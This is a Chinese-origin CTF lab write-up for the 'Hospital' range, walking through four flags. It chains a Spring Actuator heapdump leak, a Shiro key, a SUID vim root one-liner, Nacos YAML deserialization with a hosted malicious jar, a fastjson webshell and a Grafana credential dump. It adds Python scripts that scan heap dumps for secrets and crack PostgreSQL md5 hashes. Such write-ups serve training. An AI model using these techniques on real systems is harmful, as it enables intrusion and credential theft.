春秋云镜-Hospital

  1. flag01
  2. flag02
  3. flag03
  4. flag04

flag01

Start with a port scan: only 22 and 8080 are open. Running fscan against 8080 flags a Spring Boot Actuator heapdump leak:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan -h 39.99.232.64 -p 8080

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.232.64:8080 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle http://39.99.232.64:8080 code:302 len:0 toc: true
title:None redirect url: http://39.99.232.64:8080/login;jsessionid=AABFA3A139D86181B9A09BD41BE26BAD
[*] WebTitle http://39.99.232.64:8080/login;jsessionid=AABFA3A139D86181B9A09BD41BE26BAD code:200 len:2005 toc: true
title:医疗管理后台
[+] PocScan http://39.99.232.64:8080 poc-yaml-spring-actuator-heapdump-file
done 1/1
[*] scan finished, elapsed: 6.890674118s

Fetch /actuator/heapdump to download the heap dump, then analyse it with JDumpSpider. A heap dump is a snapshot of every live object, so whatever secret the application holds in memory (datasource credentials, session keys, the Shiro rememberMe key) can be recovered from it:

E:\CTF\heapdump via ☕ v17.0.11
❯ java -jar .\JDumpSpider-1.1-SNAPSHOT-full.jar .\heapdump
===========================================
SpringDataSourceProperties
-------------
not found!

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
not found!

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
server.port = 8080
spring.thymeleaf.prefix = classpath:/templates/

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
java.class.path = /app/login-1.0-SNAPSHOT.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
user.country = US
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /app/login-1.0-SNAPSHOT.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.5978727065775558529.8080
java.version = 1.8.0_392
user.home = /home/app
user.language = en
PID = 750
java.awt.printerjob = sun.print.PSPrinterJob
file.separator = /
catalina.base = /tmp/tomcat.5978727065775558529.8080
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
sun.arch.data.model = 64
catalina.useNaming = false
security.overridePropertiesFile = true
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
security.provider.7 = com.sun.security.sasl.Provider
sun.java.command = /app/login-1.0-SNAPSHOT.jar
security.provider.9 = sun.security.smartcardio.SunPCSC
java.specification.vendor = Oracle Corporation
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
security.provider.3 = sun.security.ec.SunEC
networkaddress.cache.negative.ttl = 10
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
file.separator = /
org.springframework.web.servlet.HandlerExceptionResolver = org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver,org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver,org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
org.springframework.web.servlet.HandlerMapping = org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping,org.springframework.web.servlet.function.support.RouterFunctionMapping
org.springframework.web.servlet.HandlerAdapter = org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter,org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter,org.springframework.web.servlet.function.support.HandlerFunctionAdapter
org.springframework.web.servlet.FlashMapManager = org.springframework.web.servlet.support.SessionFlashMapManager
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
org.springframework.web.servlet.ThemeResolver = org.springframework.web.servlet.theme.FixedThemeResolver
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
user.name = app
policy.url.1 = file:${java.home}/lib/security/java.policy
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
policy.ignoreIdentityScope = false
file.encoding = UTF-8
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
jdk.sasl.disabledMechanisms =
java.io.tmpdir = /tmp
org.springframework.web.servlet.ViewResolver = org.springframework.web.servlet.view.InternalResourceViewResolver
java.version = 1.8.0_392
java.vm.specification.name = Java Virtual Machine Specification
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
PID = 750
java.awt.printerjob = sun.print.PSPrinterJob
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.vendor = Private Build
java.specification.maintenance.version = 5
handlers = java.util.logging.ConsoleHandler
sun.io.unicode.encoding = UnicodeLittle
krb5.kdc.bad.policy = tryLast
java.class.path = /app/login-1.0-SNAPSHOT.jar
java.vm.vendor = Private Build
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
login.configuration.provider = sun.security.provider.ConfigFile
user.timezone =
java.vm.specification.version = 1.8
os.name = Linux
user.country = US
jdk.security.caDistrustPolicies = SYMANTEC_TLS
sun.cpu.endian = little
user.home = /home/app
user.language = en
en = UTF-8
jdk.tls.alpnCharset = ISO_8859_1
ssl.KeyManagerFactory.algorithm = SunX509
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
com.xyz.foo.level = SEVERE
policy.provider = sun.security.provider.PolicyFile
path.separator = :
fr = UTF-8
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
org.springframework.web.servlet.RequestToViewNameTranslator = org.springframework.web.servlet.view.DefaultRequestToViewNameTranslator
spring.beaninfo.ignore = true
java.vm.name = OpenJDK 64-Bit Server VM
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.5978727065775558529.8080
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
catalina.base = /tmp/tomcat.5978727065775558529.8080
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode
keystore.type = jks
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
not found!

===========================================

Among the results is a Shiro rememberMe key:

algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

With the key known, a Shiro exploitation tool can forge rememberMe cookies, inject an in-memory webshell and connect with Behinder (冰蝎). A quick sanity check that this is the live key: Shiro answers any rememberMe cookie it cannot decrypt or deserialize with Set-Cookie: rememberMe=deleteMe, so a cookie encrypted under the correct key must come back without that header.
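To show what the heap-dump tooling is actually doing, here is an added example (not the writeup's own code and not JDumpSpider's): a minimal scanner for the HPROF format that every JVM heap dump uses. It walks the record stream, extracts the STRING records (tag 0x01) and greps them for Spring property values, JDBC URLs, passwords and base64 blobs of AES key length. The sample dump it builds when run without a file argument is constructed for the demo; the match patterns are a hand-picked assumption, and the identifier size is read from the header rather than assumed. Object fields such as the byte[] inside a CookieRememberMeManager are not strings and still need a real heap walker, which is why the writeup uses JDumpSpider.

```python
"""Minimal HPROF string scanner (added example, not part of the original
writeup and not JDumpSpider's code).

HPROF layout: a NUL-terminated format string ("JAVA PROFILE 1.0.2"), a u4
identifier size, a u8 timestamp, then records of u1 tag, u4 time, u4 length
and a body. STRING records (tag 0x01) hold an ID followed by UTF-8 text.
"""
import re
import struct

STRING_TAG = 0x01

# Patterns worth a look in any heap dump (assumption: hand-picked, extend as needed).
INTERESTING = [
    re.compile(r"(?i)(password|passwd|secret|token|key)\s*[=:]"),
    re.compile(r"^jdbc:[a-z]+://", re.I),
    re.compile(r"^(spring|management|server)\.[a-zA-Z.\-]+\s*="),
    re.compile(r"^[A-Za-z0-9+/]{22}==$"),   # base64 of 16 bytes: AES-128 key sized
    re.compile(r"^[A-Za-z0-9+/]{43}=$"),    # base64 of 32 bytes: AES-256 key sized
]


def iter_hprof_strings(data: bytes):
    """Yield (string_id, text) for every STRING record in an HPROF blob."""
    nul = data.index(b"\x00")              # end of the NUL-terminated format string
    pos = nul + 1
    (id_size,) = struct.unpack_from(">I", data, pos)
    pos += 4 + 8                           # u4 identifier size + u8 timestamp
    id_fmt = ">Q" if id_size == 8 else ">I"
    while pos + 9 <= len(data):
        tag = data[pos]
        (_time, length) = struct.unpack_from(">II", data, pos + 1)
        body = data[pos + 9 : pos + 9 + length]
        pos += 9 + length
        if tag != STRING_TAG:
            continue                       # skip LOAD_CLASS, HEAP_DUMP_SEGMENT, ...
        (sid,) = struct.unpack_from(id_fmt, body, 0)
        yield sid, body[id_size:].decode("utf-8", errors="replace")


def interesting_strings(data: bytes):
    """Return the de-duplicated strings that match at least one pattern, in dump order."""
    hits, seen = [], set()
    for _sid, text in iter_hprof_strings(data):
        if text in seen:
            continue
        if any(p.search(text) for p in INTERESTING):
            seen.add(text)
            hits.append(text)
    return hits


def build_hprof(strings, id_size=8):
    """Construct a tiny HPROF file containing only STRING records.

    Used to feed the scanner a sample offline; a real dump carries many more
    record types, which iter_hprof_strings skips by tag."""
    out = bytearray(b"JAVA PROFILE 1.0.2\x00")
    out += struct.pack(">I", id_size) + struct.pack(">Q", 0)
    id_fmt = ">Q" if id_size == 8 else ">I"
    for i, s in enumerate(strings, start=1):
        body = struct.pack(id_fmt, i) + s.encode("utf-8")
        out += bytes([STRING_TAG]) + struct.pack(">II", 0, len(body)) + body
    return bytes(out)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
    else:
        # Constructed sample, not taken from the real target.
        blob = build_hprof([
            "management.endpoints.web.exposure.include = *",
            "java.class.path",
            "jdbc:mysql://10.0.0.5:3306/his",
            "spring.datasource.password = ChangeMe!",
            "GAYysgMQhG7/CzIJlVpR2g==",
        ])
    for hit in interesting_strings(blob):
        print(hit)
```

Run it as python hprof_strings.py heapdump to triage a real dump. The hits are a grep starting point: the exposure.include = * line above is what made /actuator/heapdump reachable in the first place, and the key-sized base64 strings are candidates to try as a Shiro key.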

On the box, vim.basic is SUID root:

app@web01:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

python3 is available, so the vim entry on https://gtfobins.github.io/gtfobins/vim/ gives root directly: the SUID vim runs its embedded Python interpreter with effective UID 0, and sh -p keeps that effective UID instead of dropping it to the real one. flag01 is in /root/flag.

/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

flag02

Next, set up a proxy tunnel into the internal network, upload fscan to web01 and scan the /24 it sits in:

ip a   
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:0d:aa:83 brd ff:ff:ff:ff:ff:ff
inet 172.30.12.5/16 brd 172.30.255.255 scope global dynamic eth0
valid_lft 315357949sec preferred_lft 315357949sec
inet6 fe80::216:3eff:fe0d:aa83/64 scope link
valid_lft forever preferred_lft forever

./fscan -h 172.30.12.1/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-10 17:23:09] [INFO] brute-force threads: 1
[2025-04-10 17:23:09] [INFO] starting information scan
[2025-04-10 17:23:09] [INFO] CIDR range: 172.30.12.0-172.30.12.255
[2025-04-10 17:23:10] [INFO] generated IP range: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2025-04-10 17:23:10] [INFO] parsed CIDR 172.30.12.1/24 -> IP range 172.30.12.0-172.30.12.255
[2025-04-10 17:23:10] [INFO] final valid host count: 256
[2025-04-10 17:23:10] [INFO] starting host scan
[2025-04-10 17:23:10] [SUCCESS] target 172.30.12.5 alive (ICMP)
[2025-04-10 17:23:10] [SUCCESS] target 172.30.12.6 alive (ICMP)
[2025-04-10 17:23:10] [SUCCESS] target 172.30.12.236 alive (ICMP)
[2025-04-10 17:23:13] [INFO] alive hosts: 3
[2025-04-10 17:23:13] [INFO] valid ports: 233
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.236:22
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.6:445
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.6:139
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.6:135
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.5:22
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.236:8009
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.5:8080
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.236:8080
[2025-04-10 17:23:13] [SUCCESS] service identified 172.30.12.236:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.9 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-10 17:23:13] [SUCCESS] service identified 172.30.12.5:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.9 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-10 17:23:13] [SUCCESS] port open 172.30.12.6:8848
[2025-04-10 17:23:18] [SUCCESS] service identified 172.30.12.6:445 =>
[2025-04-10 17:23:18] [SUCCESS] service identified 172.30.12.6:139 => Banner:[.]
[2025-04-10 17:23:18] [SUCCESS] service identified 172.30.12.236:8009 =>
[2025-04-10 17:23:18] [SUCCESS] service identified 172.30.12.5:8080 => [http]
[2025-04-10 17:23:19] [SUCCESS] service identified 172.30.12.236:8080 => [http]
[2025-04-10 17:23:24] [SUCCESS] service identified 172.30.12.6:8848 => [http]
[2025-04-10 17:24:18] [SUCCESS] service identified 172.30.12.6:135 =>
[2025-04-10 17:24:18] [INFO] alive ports: 9
[2025-04-10 17:24:18] [INFO] starting vulnerability scan
[2025-04-10 17:24:18] [INFO] loaded plugins: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-10 17:24:18] [SUCCESS] NetBios 172.30.12.6 WORKGROUP\SERVER02
[2025-04-10 17:24:18] [SUCCESS] NetInfo scan result
target host: 172.30.12.6
hostname: Server02
discovered network interfaces:
IPv4 addresses:
└─ 172.30.12.6
[2025-04-10 17:24:18] [SUCCESS] web title http://172.30.12.5:8080 status:302 length:0 title:(none) redirect: http://172.30.12.5:8080/login;jsessionid=BD7C602596372F417AEEB44C6651A392
[2025-04-10 17:24:18] [SUCCESS] web title http://172.30.12.236:8080 status:200 length:3964 title:医院后台管理平台
[2025-04-10 17:24:19] [SUCCESS] web title http://172.30.12.5:8080/login;jsessionid=BD7C602596372F417AEEB44C6651A392 status:200 length:2005 title:医疗管理后台
[2025-04-10 17:24:19] [SUCCESS] web title http://172.30.12.6:8848 status:404 length:431 title:HTTP Status 404 – Not Found
[2025-04-10 17:24:20] [SUCCESS] target: http://172.30.12.5:8080
vuln type: poc-yaml-spring-actuator-heapdump-file
vuln name:
details:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-04-10 17:24:20] [SUCCESS] target: http://172.30.12.6:8848
vuln type: poc-yaml-alibaba-nacos
vuln name:
details:
author:AgeloVito
links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2025-04-10 17:24:21] [SUCCESS] target: http://172.30.12.6:8848
vuln type: poc-yaml-alibaba-nacos-v1-auth-bypass
vuln name:
details:
author:kmahyyg(https://github.com/kmahyyg)
links:https://github.com/alibaba/nacos/issues/4593

The scan turns up Nacos on 172.30.12.6:8848 (fscan also flags the v1 auth bypass), so start there. It accepts the default credentials nacos/nacos, and this Nacos setup is also exposed to a YAML deserialization vulnerability.

Host the malicious jar on 172.30.12.5 behind a simple web server (it goes on web01 rather than the attacker's machine so that the internal Nacos host can actually fetch it), then fire the exploit tool at Nacos. The resulting command execution on Server02 was used to add a local user, which nxc confirms over RDP through the proxy:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nxc rdp 172.30.12.6 -u lv -p Asd123132. --local-auth
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 192.168.11.1:9999 ... 172.30.12.6:3389 ... OK
[proxychains] Strict chain ... 192.168.11.1:9999 ... 172.30.12.6:3389 ... OK
[proxychains] Strict chain ... 192.168.11.1:9999 ... 172.30.12.6:3389 ... OK
[proxychains] Strict chain ... 192.168.11.1:9999 ... 172.30.12.6:3389 ... OK
RDP 172.30.12.6 3389 Server02 [*] Windows 10 or Windows Server 2016 Build 17763 (name:Server02) (domain:Server02) (nla:True)
[proxychains] Strict chain ... 192.168.11.1:9999 ... 172.30.12.6:3389 ... OK
RDP 172.30.12.6 3389 Server02 [+] Server02\lv:Asd123132. (Pwn3d!)

The user was added successfully. With the proxy in place, connect over RDP as lv; flag02 is in C:\Users\Administrator\flag.

flag03

172.30.12.236 listens on 8009 as well as 8080 (8009 is Tomcat's AJP port, so this is a Tomcat-hosted application). Its login form posts JSON. To fingerprint the JSON library, send the deliberately unterminated fastjson probe {"@type": "java.lang.AutoCloseable" and read the fastjson version out of the error response:

[image: https://raw.githubusercontent.com/h0ny/repo/main/images/2ed229594166743d.png]

Use the Burp fastjson plugin to inject an in-memory webshell, then connect with Godzilla (哥斯拉). flag03 is in /root/flag/.

flag04

This host (web03) has a second NIC:

/ >ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:0d:aa:e2 brd ff:ff:ff:ff:ff:ff
inet 172.30.12.236/16 brd 172.30.255.255 scope global dynamic eth0
valid_lft 315354333sec preferred_lft 315354333sec
inet6 fe80::216:3eff:fe0d:aae2/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:0d:aa:92 brd ff:ff:ff:ff:ff:ff
inet 172.30.54.179/24 brd 172.30.54.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe0d:aa92/64 scope link
valid_lft forever preferred_lft forever

Upload fscan to web03 and scan the 172.30.54.0/24 segment. It finds 172.30.54.12, which is two hops in, so a second-layer proxy chained through web03 is needed to reach it. The host runs Grafana and PostgreSQL. Grafana accepts the weak credentials admin/admin, and an exploit run from web03 dumps Grafana's datasource configuration, PostgreSQL password included:

2024/07/04 12:20:59 Target vulnerable has plugin [alertlist]
2024/07/04 12:20:59 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2024/07/04 12:20:59 There is [0] records in db.
2024/07/04 12:20:59 type:[postgres] name:[PostgreSQL] url:[localhost:5432] user:[postgres] password[Postgres@123] database:[postgres] basic_auth_user:[] basic_auth_password:[]
2024/07/04 12:20:59 All Done, have nice day!

Connect with psql -h 172.30.54.12 -p 5432 -U postgres and read the other roles' password hashes (pg_shadow is readable by superusers, and postgres is one): select usename, passwd from pg_shadow;

postgres=# select usename, passwd from pg_shadow;
usename | passwd
----------+-------------------------------------
root | md5da974531914a7c2c56df745574a5bd3a
postgres | md5dd27d33705155fd675e498384ad3d2ea

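The hashes above are in PostgreSQL's legacy md5 scheme: the stored value is the literal prefix md5 followed by md5(password || username), so the username acts as the salt and each role has to be attacked on its own. What follows is an added example (not the writeup's code) that parses the pg_shadow output shown above, reproduces the hash construction and tries a wordlist against every role. The wordlist is constructed for the demo; on a real engagement hand the hashes to hashcat -m 12 (the 32 hex characters without the md5 prefix, a colon, then the username) with a proper wordlist.

```python
"""PostgreSQL md5 role-password check (added example, not the writeup's code).

PostgreSQL writes 'md5' + hex(md5(password || username)) into
pg_authid.rolpassword, which pg_shadow exposes as passwd. Newer clusters
default to SCRAM-SHA-256 instead; those rows are skipped here.
"""
import hashlib
import re
from typing import Dict, Iterable, Optional

PG_MD5_RE = re.compile(r"^md5([0-9a-f]{32})$")

# The pg_shadow rows from the writeup, pasted as psql prints them (sample input).
SAMPLE_PG_SHADOW = """\
 usename  |               passwd
----------+-------------------------------------
 root     | md5da974531914a7c2c56df745574a5bd3a
 postgres | md5dd27d33705155fd675e498384ad3d2ea
"""


def pg_md5(password: str, username: str) -> str:
    """Reproduce the value PostgreSQL stores for an md5-authenticated role."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()


def parse_pg_shadow(output: str) -> Dict[str, str]:
    """Parse `select usename, passwd from pg_shadow;` table output into {role: hash}.

    Header and separator lines fall out naturally: the header's passwd column
    is the word 'passwd' and the separator has no '|', so neither matches."""
    roles = {}
    for line in output.splitlines():
        if "|" not in line:
            continue
        user, _, passwd = (part.strip() for part in line.partition("|"))
        if PG_MD5_RE.match(passwd):
            roles[user] = passwd
    return roles


def crack(hash_value: str, username: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose salted md5 equals the stored hash, else None."""
    target = hash_value.lower()
    for candidate in wordlist:
        if pg_md5(candidate, username) == target:
            return candidate
    return None


def crack_all(roles: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Try the wordlist against every role; the username salt differs per role."""
    words = list(wordlist)
    return {user: crack(h, user, words) for user, h in roles.items()}


if __name__ == "__main__":
    roles = parse_pg_shadow(SAMPLE_PG_SHADOW)
    # Constructed wordlist for the demo; a real run uses a wordlist or hashcat -m 12.
    wordlist = ["postgres", "password", "Postgres@123", "P@ssw0rd123", "admin"]
    for user, found in crack_all(roles, wordlist).items():
        print(f"{user}: {found if found else 'no match in wordlist'}")
```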
